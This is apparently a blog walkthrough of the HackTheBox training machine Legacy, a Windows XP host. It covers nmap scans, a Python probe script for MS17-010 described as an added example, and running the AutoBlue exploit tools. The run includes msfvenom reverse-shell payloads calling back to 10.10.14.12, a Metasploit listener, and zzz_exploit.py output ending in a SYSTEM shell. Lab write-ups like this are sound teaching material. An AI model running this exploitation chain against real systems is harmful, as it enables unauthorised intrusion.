This post is a walkthrough of the HackTheBox machine Legacy.
Hackthebox Legacy Walkthrough

Initial Enumeration
Port Scan
nmap -sT -p- --min-rate 10000 -Pn -oN alltcp.txt 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:53 EST
Nmap scan report for 10.10.10.4
Host is up (0.054s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
┌──(rocky㉿kali)-[~/hckbox/Legacy]
└─$ sudo nmap -sU -p- --min-rate 10000 -Pn -oN alludp.txt 10.10.10.4
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:53 EST
Nmap scan report for 10.10.10.4
Host is up.
All 65535 scanned ports on 10.10.10.4 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
┌──(rocky㉿kali)-[~/hckbox/Legacy]
└─$ sudo nmap -p 139,445,3389 -Pn -sC -sV -oN detailed.txt 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:54 EST
Nmap scan report for 10.10.10.4
Host is up (0.055s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m49s, deviation: 1h24m51s, median: 4d23h57m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a0:ca (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-02-27T10:52:47+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.08 seconds
└─$ sudo nmap -p 139,445,3389 --script vuln 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 01:59 EST
Nmap scan report for 10.10.10.4
Host is up (0.053s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
The scans give us a lot to work with. The target is a Windows XP host named LEGACY in workgroup HTB, and the only services exposed are SMB on 139/tcp and 445/tcp (3389/tcp is closed, so no RDP). The UDP scan is inconclusive: every port comes back open|filtered, which only means no ICMP port-unreachable replies were seen at that scan rate. The SMB service negotiates SMB1 only (the SMB2 probe fails), message signing is disabled, and the vuln scripts flag two remote code execution bugs:
MS08-067 (CVE-2008-4250): an overflow in the Server service's path canonicalization, reachable through a crafted RPC request
MS17-010 (CVE-2017-0143): the SMBv1 bug used by EternalBlue
SMB enumeration
Before going for MS17-010 (the EternalBlue exploit), let's see what the SMB service gives away to an unauthenticated client: shares and users.
sudo nmap -p 139,445 -script smb-enum-shares.nse 10.10.10.4
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 03:51 EST
Nmap scan report for 10.10.10.4
Host is up (0.053s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
| account_used: <blank>
| \\10.10.10.4\ADMIN$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access: <none>
| \\10.10.10.4\C$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access: <none>
| \\10.10.10.4\IPC$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 45.29 seconds
┌──(rocky㉿kali)-[~/hckbox/Legacy]
└─$ sudo nmap -p 139,445 -script smb-enum-users.nse 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 03:52 EST
Nmap scan report for 10.10.10.4
Host is up (0.053s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
Anonymous access is denied on ADMIN$ and C$; only IPC$ accepts a read-only null session (which is all the SMB vuln scripts need), and smb-enum-users finds nothing, so there is nothing more to pull from SMB without credentials. The scan above clearly shows that the MS17-010 (EternalBlue) exploit is applicable in this case. Unfortunately I could not find any Python 3 script that can be used for exploitation. There are Python 2 scripts available, so your VM should be configured with Python 2 and pip.
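To make the "VULNERABLE" verdict above less of a black box, here is the check that nmap's smb-vuln-ms17-010 and AutoBlue's eternal_checker.py perform, written out as an added example for this walkthrough (it is not code from the original post, nor from the AutoBlue or worawit repositories): open a null session to IPC$ over SMB1, send an SMB_COM_TRANSACTION with the PeekNamedPipe subcommand on FID 0, and classify the NT status the server returns. An unpatched SMB1 server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one answers STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. The same session setup response carries the NativeOS string ("Windows 5.1" for XP) that the exploit scripts later print as "Target OS", and the negotiate response carries the SecurityMode byte behind nmap's smb-security-mode output. The default target address, the timeout, and the sample response bytes used for offline checks are assumptions; probe() needs a live host that allows a null session on IPC$, as Legacy does.

```python
"""Bare-bones SMB1 (NT LM 0.12) client pieces for an MS17-010 probe.

Added example; not code from the walkthrough or from AutoBlue/worawit.
Host, port and the sample responses used for offline checks are assumptions.
"""
import socket
import struct

NEGOTIATE, SESSION_SETUP, TREE_CONNECT, TRANSACTION = 0x72, 0x73, 0x75, 0x25
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205                          # unpatched
STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE = 0xC0000022, 0xC0000008  # patched
HDR = 32  # SMB1 header size, excluding the 4-byte NetBIOS session header


def smb_header(cmd, tid=0, uid=0, mid=1, status=0):
    # Flags1 0x18: canonical paths, case-insensitive. Flags2 0x4001: 32-bit NT
    # status + long names; extended security (0x0800) and unicode (0x8000) are
    # left clear so the server sends the classic negotiate response and ASCII
    # strings, which keeps the parsers below simple.
    return b"\xffSMB" + struct.pack("<BIBHH8sHHHHH", cmd, status, 0x18, 0x4001,
                                    0, b"\0" * 8, 0, tid, 0xFEFF, uid, mid)


def wrap(smb):
    """Prefix the 4-byte NetBIOS session header (type 0, 24-bit length)."""
    return struct.pack(">I", len(smb)) + smb


def negotiate_req():
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def session_setup_req():
    # Null session: 1-byte empty OEM password, empty account and domain.
    # Capabilities 0x50 = CAP_NT_SMBS | CAP_STATUS32.
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 2, 1, 0, 1, 0, 0, 0x50)
    data = b"\x00" + b"\x00" + b"\x00" + b"probe\x00" + b"probe\x00"
    return smb_header(SESSION_SETUP) + bytes([13]) + words + struct.pack("<H", len(data)) + data


def tree_connect_req(uid, host):
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # no AndX, flags 0, pwlen 1
    return smb_header(TREE_CONNECT, uid=uid) + bytes([4]) + words + struct.pack("<H", len(data)) + data


def peek_named_pipe_req(tid, uid):
    name = b"\\PIPE\\\x00"
    off = HDR + 1 + 32 + 2 + len(name)        # where the (empty) params/data would sit
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, off, 0, off, 2, 0)   # 14 words, SetupCount 2
    setup = struct.pack("<HH", 0x23, 0)          # TRANS_PEEK_NMPIPE on FID 0
    return (smb_header(TRANSACTION, tid, uid) + bytes([16]) + words + setup
            + struct.pack("<H", len(name)) + name)


def parse(msg):
    """Split a NetBIOS+SMB1 message into header fields plus the body after the header."""
    if len(msg) < 4 + HDR or msg[4:8] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    f = struct.unpack("<BIBHH8sHHHHH", msg[8:4 + HDR])
    return {"cmd": f[0], "status": f[1], "tid": f[7], "uid": f[9], "body": msg[4 + HDR:]}


def security_mode(neg):
    """SecurityMode bits of a negotiate response (what nmap's smb-security-mode reports)."""
    sm = neg["body"][3]  # WordCount(1) + DialectIndex(2), then SecurityMode
    return {"user_level": bool(sm & 1), "challenge_response": bool(sm & 2),
            "signing_enabled": bool(sm & 4), "signing_required": bool(sm & 8)}


def native_os(ss):
    """NativeOS string of a session setup response; 'Windows 5.1' is XP."""
    wc = ss["body"][0]
    return ss["body"][1 + 2 * wc + 2:].split(b"\x00")[0].decode(errors="replace")


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"
    return "unknown (0x%08X)" % status


def probe(host, port=445, timeout=5):
    """Live check of one host; needs a null session on IPC$ (assumed reachable)."""
    s = socket.create_connection((host, port), timeout)

    def xchg(smb):
        s.sendall(wrap(smb))
        hdr = s.recv(4)
        n, data = struct.unpack(">I", hdr)[0] & 0xFFFFFF, b""
        while len(data) < n:
            chunk = s.recv(n - len(data))
            if not chunk:
                raise ConnectionError("server closed the connection")
            data += chunk
        return parse(hdr + data)

    try:
        neg = xchg(negotiate_req())
        ss = xchg(session_setup_req())
        tc = xchg(tree_connect_req(ss["uid"], host))
        pk = xchg(peek_named_pipe_req(tc["tid"], ss["uid"]))
    finally:
        s.close()
    return {"os": native_os(ss), "security": security_mode(neg), "ms17_010": classify(pk["status"])}


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1] if len(sys.argv) > 1 else "10.10.10.4"))  # default host assumed
```

Run it as `python3 ms17_probe.py 10.10.10.4` against the lab box; it prints the NativeOS string, the signing flags, and the verdict. The request builders deliberately leave the unicode and extended-security flags clear so that a single ASCII parser covers the negotiate and session setup replies; that is a convenience for a probe, not something a full client would do.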
└─$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 126, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 126 (delta 40), reused 35 (delta 35), pack-reused 76
Receiving objects: 100% (126/126), 94.22 KiB | 302.00 KiB/s, done.
Resolving deltas: 100% (74/74), done.
┌──(rocky㉿kali)-[~/tool/exp]
└─$ cd AutoBlue-MS17-010
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ pip install -r requirements.txt
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220218.140931.6042675a-py3.9.egg (from -r requirements.txt (line 1)) (0.9.25.dev1+20220218.140931.6042675a)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.16.0)
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ sudo pip install -r requirements.txt
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ./shell_prep.sh
zsh: no such file or directory: ./shell_prep.sh
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ls
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ cd shellcode
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010/shellcode]
└─$ ls
eternalblue_kshellcode_x64.asm eternalblue_kshellcode_x86.asm eternalblue_sc_merge.py shell_prep.sh
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010/shellcode]
└─$ ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.12
LPORT you want x64 to listen on:
8989
LPORT you want x86 to listen on:
8989
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
0
Type 0 to generate a staged payload or 1 to generate a stageless payload
0
Generating x64 meterpreter shell (staged)...
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.12 LPORT=8989
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 511 bytes
Saved as: sc_x64_msf.bin
Generating x86 meterpreter shell (staged)...
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.12 LPORT=8989
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 375 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
Now start the listener script. One thing to watch: shell_prep.sh asks for separate x64 and x86 ports and I gave 8989 to both, so the second multi/handler cannot bind (the Rex::BindFailed error below); use two different ports. In this case the listener and the generated shellcode were not useful anyway, since the machine is too old for the eternalblue_exploit scripts, but the same steps apply to newer targets.
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ls
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ ./listener_prep.sh
__
/,-
||)
\\_, )
`--'
Enternal Blue Metasploit Listener
LHOST for reverse connection:
10.10.14.12
LPORT for x64 reverse connection:
8989
LPORT for x86 reverse connection:
8989
Enter 0 for meterpreter shell or 1 for regular cmd shell:
0
Type 0 if this is a staged payload or 1 if it is for a stageless payload
0
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service.
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (config.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.12
LHOST => 10.10.14.12
resource (config.rc)> set LPORT 8989
LPORT => 8989
resource (config.rc)> set ExitOnSession false
ExitOnSession => false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (config.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (config.rc)> set LPORT 8989
[*] Started reverse TCP handler on 10.10.14.12:8989
LPORT => 8989
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 10.10.14.12:8989:- -
[-] Handler failed to bind to 0.0.0.0:8989:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8989).
msf6 exploit(multi/handler) >
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ python eternalblue_exploit7.py 10.10.10.4 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 5.1
This exploit does not support this target
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ python eternalblue_exploit8.py 10.10.10.4 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 5.1
This exploit does not support this target
It did not work because eternalblue_exploit7.py, eternalblue_exploit8.py and eternalblue_exploit10.py target Windows 7/2008 R2, Windows 8/2012 and Windows 10 respectively: they read the server's NativeOS string from the session setup response, see Windows 5.1 (XP), and bail out. The same folder also ships zzz_exploit.py, which reaches the MS17-010 transaction bug by a different route: it leaks and corrupts an SMB transaction structure to get arbitrary kernel read/write, overwrites the token of its own SMB session to make it SYSTEM, and then runs commands through that session, so it needs no kernel shellcode and works on Windows XP. The shell it drops is plain cmd.exe, so whoami.exe (not shipped with a default XP install) and getuid (a Meterpreter command, not a cmd command) both fail below.
└─$ ls
config.rc eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
┌──(rocky㉿kali)-[~/tool/exp/AutoBlue-MS17-010]
└─$ python zzz_exploit.py 10.10.10.4
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81b25760
SESSION: 0xe10946b8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe20671b0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2067250
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^)
[!] Executing interactive programs will hang shell!
C:\WINDOWS\system32>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>dir